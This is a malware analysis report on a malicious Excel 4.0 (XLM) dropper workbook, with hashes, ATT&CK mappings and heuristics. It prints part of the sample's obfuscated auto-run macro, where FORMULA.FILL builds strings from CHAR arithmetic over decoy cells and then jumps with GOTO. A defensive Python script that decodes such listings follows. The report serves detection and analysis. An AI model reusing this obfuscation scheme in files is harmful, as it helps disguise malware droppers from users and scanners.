Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1236ca8e758869c9…

MALICIOUS

Office (OLE)

Size: 174.5 KB
Created: 2020-05-13 09:54:33
Authoring application: Microsoft Excel
First seen: 2020-05-25
MD5: e928faf192f8b2dc5983a5cb41500dd5
SHA-1: 3b2496948c79a159a3907030f02d3a6ba4b8d930
SHA-256: 1236ca8e758869c98197aac5106cf647fe56b4f6bf8365b4f6b0a657b45216ec
Risk score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution
Note on the second mapping: no Excel vulnerability is exploited here. The XLM macro runs only after a user opens the workbook and enables macros, which is better described by T1204.002 User Execution: Malicious File.

The file is a legacy binary (OLE/BIFF) Excel workbook that contains an Excel 4.0 (XLM) macro sheet with an Auto_Open defined name, so the macro sheet executes as soon as a user opens the workbook with macros enabled. Heuristics flag dangerous XLM functions such as RUN, indicating the macro is built to execute a secondary payload, and the ClamAV signature Xls.Dropper.Agent-7819198-0 corroborates the dropper classification.

Heuristics (4)

  • ClamAV: Xls.Dropper.Agent-7819198-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Dropper.Agent-7819198-0.
  • Excel 4.0 Auto_Open defined name [critical, OLE_XLM_AUTOOPEN_DEFINEDNAME]
    oletools recovered an Auto_Open / Auto_Close entry from the Excel 4.0 macro sheet. Because the defined name is stored as a tokenized BIFF record (ptgRef3d) rather than as a plain string, a byte-string check can miss it or see only part of it; the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical, OLE_XLM_DANGEROUS_FN]
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with XLM formula APIs that can invoke programs, write files, or transfer control without any VBA.
  • Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 126190 bytes
SHA-256: afbd12bef2bd65f133abd30b98bf1bda2ce830ab3a0e89b75b433f90831d7d17
Preview (first 1,000 lines of the extracted listing):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!T22220 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,EF2,"",319.00000000000000000000
'  Sheet,JN3,"",-0.27125506072874494556
'  Sheet,HA21,"",401.00000000000000000000
'  Sheet,HO34,"",-269.00000000000000000000
'  Sheet,IJ44,"",0.00000000000000000000
'  Sheet,F51,"",-2.94047619047619068766
'  Sheet,HF59,"",-568.00000000000000000000
'  Sheet,FE89,"",231.00000000000000000000
'  Sheet,JM103,"",-0.24285714285714285476
'  Sheet,DG143,"",-16.00000000000000000000
'  Sheet,DC162,"",213.00000000000000000000
'  Sheet,FL171,"",-1.00000000000000000000
'  Sheet,IO181,"",-0.18888888888888888395
'  Sheet,EC192,"",0.73333333333333328152
'  Sheet,GF303,"",-4.81818181818181834331
'  Sheet,BB305,"",-415.62500000000000000000
'  Sheet,FC327,"",286.00000000000000000000
'  Sheet,IM355,"",0.05555555555555555247
'  Sheet,ER362,"",145.00000000000000000000
'  Sheet,DW381,"",-0.19028340080971659076
'  Sheet,CL382,"",4.46835443037974666680
'  Sheet,F439,"",2.13043478260869578733
'  Sheet,DD440,"",3.79569892473118297715
'  Sheet,ET446,"",177.00000000000000000000
'  Sheet,GL466,"",260.00000000000000000000
'  Sheet,EO656,"",-0.37651821862348178183
'  Sheet,O657,"",-143.00000000000000000000
'  Sheet,BH709,"",5.26865671641791077917
'  Sheet,JT709,"",0.11111111111111110494
'  Sheet,JI715,"",-26.00000000000000000000
'  Sheet,DT720,"",8.37254901960784359005
'  Sheet,DS742,"",-4.66037735849056566906
'  Sheet,V789,"",545.00000000000000000000
'  Sheet,IL806,"",-567.00000000000000000000
'  Sheet,HC850,"",1.75892857142857139685
'  Sheet,FY944,"FORMULA.FILL(CHAR(GH22172-FL171)&CHAR(GH22172/GL3274)&CHAR(L1792-BM39822)&CHAR(L1792*BS14056)&CHAR(IZ54844-JN62167)&CHAR(HN56344*FS1451)&CHAR(FD41003/BJ44225)&CHAR(IZ54844/BK19420)&CHAR(L1792-FH9519)&CHAR(FD41003+DV62033)&CHAR(CZ60163-HA30445)&CHAR(HA21781*CM9922)&CHAR(L1792-IH5987)&CHAR(FD41003/BO41290)&CHAR(CZ60163+IK63175)&CHAR(HN56344*FL26672)&CHAR(HA21781*DG6217)&CHAR(HA21781*EB3726)&CHAR(IZ54844/GY34718)&CHAR(GH22172+IW45117)&CHAR(FD41003-GM35273)&CHAR(L1792*HJ34141)&CHAR(GH22172-HV40531)&CHAR(L1792*JD57976)&CHAR(L1792*L59902)&CHAR(IZ54844/DG44747)&CHAR(CZ60163-HG9006)&CHAR(IZ54844*IJ56109)&CHAR(EC42994/DZ56957)&CHAR(HA21781+GC23113)&CHAR(HN56344/DY19234)&CHAR(IZ54844/X5050)&CHAR(GH22172+EI30325)&CHAR(FD41003-HT7851),JI48399)",""
'  Sheet,FY945,GOTO(JK64244),""
'  Sheet,EV1065,"",2.59210526315789469010
'  Sheet,ID1102,"",155.00000000000000000000
'  Sheet,JQ1177,"",7.46341463414634187501
'  Sheet,BS1234,"",2.66216216216216228219
'  Sheet,JJ1234,"",0.14869281045751633896
'  Sheet,HS1249,"",-0.46558704453441296378
'  Sheet,FU1254,"",388.62500000000000000000
'  Sheet,HR1256,"",284.00000000000000000000
'  Sheet,DC1307,"",-336.00000000000000000000
'  Sheet,IO1341,"",-0.29554655870445345478
'  Sheet,IP1354,"",292.00000000000000000000
'  Sheet,FK1409,"",-301.00000000000000000000
'  Sheet,R1415,"",-349.00000000000000000000
'  Sheet,BO1435,"",440.00000000000000000000
'  Sheet,FS1451,"",-0.62222222222222223209
'  Sheet,FV1536,"",-238.00000000000000000000
'  Sheet,BR1538,"",530.00000000000000000000
'  Sheet,P1544,"",11.12727272727272698205
'  Sheet,BU1579,"FORMULA.FILL(CHAR(GJ35831-BN30163)&CHAR(DI1826+BG31375)&CHAR(DA51790/FU17203)&CHAR(GF53492/IK6530)&CHAR(CI34785/FH51728)&CHAR(FY63197+G16071)&CHAR(DI1826-X40459)&CHAR(GE3002-DC63248)&CHAR(CP50473*P54882)&CHAR(CI34785*DW381)&CHAR(GJ35831+HJ53825)&CHAR(CP50473-BA16844)&CHAR(GJ35831+DF23181)&CHAR(CI34785*HS1249)&CHAR(GF53492-IW61553)&CHAR(GE3002*IG27297)&CHAR(FY63197/CA15386)&CHAR(GF53492*JU19608)&CHAR(GE3002/EW24957)&CHAR(GY58288/GH24056)&CHAR(CP50473*CN10631)&CHAR(GJ35831+CS52600)&CHAR(GJ35831/FF22880)&CHAR(DI1826-IT3239)&CHAR(IO2387*FW2179)&
... (truncated)
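The listing above shows the two things the OLE_XLM_AUTOOPEN_DEFINEDNAME and OLE_XLM_DANGEROUS_FN heuristics key on: an Auto_Open built-in name pointing into the macro sheet, and FORMULA.FILL formulas that build a string from CHAR(cell op cell) terms whose operands are the decoy numeric cells scattered around the sheet. The following Python is an added example, not the analyzer's own code and not part of the original report: it parses an olevba-style XLM listing, reports the auto-execution entry and dangerous formula APIs, and decodes the CHAR arithmetic by looking the operands up in the parsed cells. The listing, cell values and decoded string are constructed for the example, the DANGEROUS_XLM_FUNCTIONS set is my own illustrative list rather than the rule set behind OLE_XLM_DANGEROUS_FN, and the example assumes Excel's CHAR truncates a fractional argument to an integer.

```python
"""Triage an olevba-style Excel 4.0 (XLM) macro listing: find the Auto_Open
defined name, flag dangerous formula APIs, and decode CHAR() arithmetic chains."""
import csv
import operator
import re

# Illustrative set of XLM functions that start programs, write files or move
# control. This is my own list for the example, not the analyzer's rule set.
DANGEROUS_XLM_FUNCTIONS = {
    "EXEC", "CALL", "RUN", "REGISTER",       # invoke programs or native code
    "FOPEN", "FWRITE", "FWRITELN",           # write files
    "FORMULA", "FORMULA.FILL", "GOTO",       # write formulas / transfer control
}

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
OPERAND = r"[A-Z]{1,3}[0-9]+|-?[0-9]+(?:\.[0-9]+)?"          # cell ref or numeric literal
CHAR_RE = re.compile(rf"CHAR\(\s*({OPERAND})\s*(?:([-+*/])\s*({OPERAND}))?\s*\)")
AUTO_RE = re.compile(r"built-in-name\s+\d+\s+(Auto_Open|Auto_Close)\b.*?(\S+![A-Z]{1,3}[0-9]+)\s*$")
FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")

# Constructed listing in the shape olevba prints (apostrophe-prefixed BIFF record
# comments, then Sheet,Reference,Formula,Value rows). Cells, values and the
# resulting string are made up; they are not the analysed sample's contents.
SAMPLE_LISTING = """\
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!A1
' Sheet,Reference,Formula,Value
'  Sheet,B1,"",100.00000000000000000000
'  Sheet,B2,"",-1.00000000000000000000
'  Sheet,B3,"",9.00000000000000000000
'  Sheet,B4,"",1.00000000000000000000
'  Sheet,B5,"",32.00000000000000000000
'  Sheet,B6,"",53.00000000000000000000
'  Sheet,B7,"",3.00000000000000000000
'  Sheet,B8,"",8.00000000000000000000
'  Sheet,B9,"",0.00000000000000000000
'  Sheet,A1,"FORMULA.FILL(CHAR(B1+B2)&CHAR(B1+B3)&CHAR(B1*B4)&CHAR(B5/B4)&CHAR(B1-B6)&CHAR(B1+B2)&CHAR(B5/B4)&CHAR(B1+B2)&CHAR(B1-B7)&CHAR(B1+B8)&CHAR(B1+B2),C1)",""
'  Sheet,A2,GOTO(C1),""
"""


def parse_listing(text):
    """Return (auto_exec entries, cells). cells maps 'Sheet!REF' -> (formula, value),
    with value converted to float when the listing gives a number."""
    auto_exec, cells = [], {}
    for raw in text.splitlines():
        line = raw.lstrip("' ").rstrip()
        m = AUTO_RE.search(line)
        if m:                                   # built-in name record, e.g. Auto_Open -> Sheet!A1
            auto_exec.append((m.group(1), m.group(2)))
            continue
        try:
            row = next(csv.reader([line]))      # formulas containing commas are CSV-quoted
        except csv.Error:
            continue
        if len(row) != 4 or not re.fullmatch(r"[A-Z]{1,3}[0-9]+", row[1]):
            continue                            # BIFF record dump, header or blank line
        sheet, ref, formula, value = row
        try:
            value = float(value)
        except ValueError:
            pass
        cells[f"{sheet}!{ref}"] = (formula, value)
    return auto_exec, cells


def resolve_char_chain(formula, cells, sheet="Sheet"):
    """Evaluate every CHAR(<cell|number> [op <cell|number>]) in a formula using the
    numeric cell values and concatenate the characters, as the & chain would at
    run time. Unresolvable terms become '?' and are returned separately."""
    def operand(tok):
        if re.fullmatch(r"-?[0-9]+(?:\.[0-9]+)?", tok):
            return float(tok)
        _, value = cells.get(tok if "!" in tok else f"{sheet}!{tok}", ("", None))
        return value if isinstance(value, float) else None

    out, unresolved = [], []
    for m in CHAR_RE.finditer(formula):
        a, op, b = m.groups()
        left, right = operand(a), (operand(b) if b else None)
        try:
            if left is None or (b and right is None):
                raise ValueError("operand cell missing or non-numeric")
            n = int(OPS[op](left, right) if op else left)   # assumption: CHAR truncates fractions
        except (ValueError, ZeroDivisionError):
            unresolved.append(m.group(0))
            out.append("?")
            continue
        out.append(chr(n) if 1 <= n <= 255 else "?")
    return "".join(out), unresolved


def analyze(text):
    """Produce a small triage record from a listing: auto-exec entries, dangerous
    XLM functions seen in any formula, decoded CHAR chains per cell, and a verdict."""
    auto_exec, cells = parse_listing(text)
    found, decoded = set(), {}
    for key, (formula, _) in cells.items():
        if not formula:
            continue
        found.update(f for f in FUNC_RE.findall(formula) if f in DANGEROUS_XLM_FUNCTIONS)
        if "CHAR(" in formula:
            decoded[key] = resolve_char_chain(formula, cells, key.split("!")[0])[0]
    if auto_exec and found:
        verdict = "malicious"
    elif auto_exec or found:
        verdict = "suspicious"
    else:
        verdict = "no XLM indicators"
    return {"auto_exec": auto_exec, "dangerous_functions": sorted(found),
            "decoded": decoded, "verdict": verdict}


if __name__ == "__main__":
    print(analyze(SAMPLE_LISTING))
```

On a real listing, run `olevba --decode` (or the `extract_all_macros` API the artifact table names) to produce the text, then feed it to `analyze`. Terms that reference cells outside the first 1,000 preview lines, as most of the operands on this page do, come back as `?` in the decoded string and are listed as unresolved, so the full listing rather than the preview is what you want to decode.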